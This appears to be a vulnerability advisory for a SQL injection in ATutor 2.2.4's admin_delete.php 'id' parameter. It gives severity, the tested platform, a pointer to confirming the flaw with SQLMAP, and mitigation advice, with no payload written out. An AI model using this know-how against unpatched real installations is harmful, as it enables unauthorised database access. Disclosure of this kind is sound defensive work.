Vendor: ATutor
By: Andrey Stoykov
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: ATutor
Affected Version From: ATutor 2.2.4
Affected Version To: ATutor 2.2.4
Patch Exists: YES
Related CWE: N/A
CPE: a:atutor:atutor
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: LAMP on Ubuntu 18.04
Year: 2020
ATutor 2.2.4 – ‘id’ SQL Injection
ATutor 2.2.4 is vulnerable to SQL injection through the 'id' parameter of the admin_delete.php page. An attacker can exploit this by sending a specially crafted HTTP request carrying a malicious 'id' value. The injection can be confirmed with SQLMAP when a valid User-Agent header and the appropriate session cookies are supplied.
Mitigation:
Ensure that the 'id' parameter, and user input in general, is validated and sanitized before it is used in SQL queries (for an integer identifier, casting to an integer or binding it through a prepared statement removes the injection). A patch exists, so affected installations should be updated.